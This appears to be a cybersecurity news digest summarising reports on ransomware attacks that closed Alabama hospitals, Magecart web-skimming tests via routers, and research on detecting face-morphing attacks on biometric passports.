    Healthcare organizations are increasingly being targeted in ransomware attacks as indicated by recent attacks on hospitals in Alabama, Ohio, West Virginia, and the Australian state of Victoria. One recent ransomware attack has resulted in the closure of three hospitals in Alabama, which are ran by a nonprofit firm, called DCH Health System. Security experts encourage the health industry to adopt a more proactive approach to disaster recovery (DR) planning, mitigating security vulnerabilities, and bolstering cybersecurity resilience. Hospitals' IT teams should update their DR strategies and invest in technologies that would ensure continuous availability of patient data and significantly decrease downtime in the event of a ransomware attack or other type of cyberattack. This article continues to discuss recent ransomware attacks on healthcare organizations and the actions that should be taken by the healthcare industry to address such attacks.

    SiliconANGLE reports "Alabama Hospitals Forced to Close After Ransomware Attack"

  • news

    Visible to the public "Magecart Web Skimming Group Targets Public Hotspots and Mobile Users"

    Magecart is composed of multiple sophisticated hacking groups aimed at stealing credit card numbers through the performance of web-based card-skimming attacks. Security researchers from IBM's X-Force Incident Response and Intelligence Services team have discovered the testing of malicious scripts by Magecart Group 5 (MG5) to inject into websites via commercial routers in order to steal payment details. Previous Magecart attacks largely focused on injecting credit-card skimmers into checkout pages to steal payment details. High-profile brands that have been targeted by Magecart include British Airways, TicketMaster, and Newegg. This article continues to discuss the new tactics being used by one Magecart group to pilfer payment card information and the X-Force team's advice for website owners on how to protect their users from such attacks.

    CSO Online reports "Magecart Web Skimming Group Targets Public Hotspots and Mobile Users"

  • news

    Visible to the public "Preventing Manipulation in Automated Face Recognition"

    The adoption and implementation of automated face recognition continues to increase. However, this method of authentication remains vulnerable to morphing attacks in which different facial images are merged together to create a fake image. A photo stored in a biometric passport that has been altered in such a manner can allow two different people to use the same passport. A team of researchers from the Fraunhofer Institute and the Heinrich Hertz Institute are working on developing a process that uses machine learning methods to prevent the success of morphing attacks in a project called ANANAS (Anomaly Detection for Prevention of Attacks on Authentication Systems Based on Facial Images). This article continues to discuss the biometric facial recognition process, the execution of morphing attacks, and the research project aimed at preventing such attacks.

    TechXplore reports "Preventing Manipulation in Automated Face Recognition"